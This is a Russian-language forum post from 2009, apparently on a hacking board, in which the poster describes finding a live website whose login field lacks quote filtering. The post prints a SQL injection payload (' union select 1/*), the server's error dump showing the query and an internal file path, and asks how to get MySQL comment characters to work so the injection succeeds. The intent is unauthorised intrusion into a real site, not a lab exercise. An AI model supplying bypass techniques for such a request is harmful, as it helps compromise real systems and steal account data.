23.05.2009, 01:31
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
не работают "комментарии" в MySQL
нашел сайтик там в поле логина нет проверки на '.
ну и выдает при запросе 'union select 1/*
Код:
Context info for the following error/warning:
Error: 1024, Query(r) failed:
SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email=''
With result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND u.email=''' at line 4
in /local/rnsw/www/32/apache2/maoli/core/library/db.php, 381
call: DB->queryex("r", "SELECT u.email, u.userid
FROM user u
WHERE u.username='1' union select 1/*'
AND u.email=''")
и так дальше в таком же духе... не --, не # не помогает... что можно попробывать? |
|
|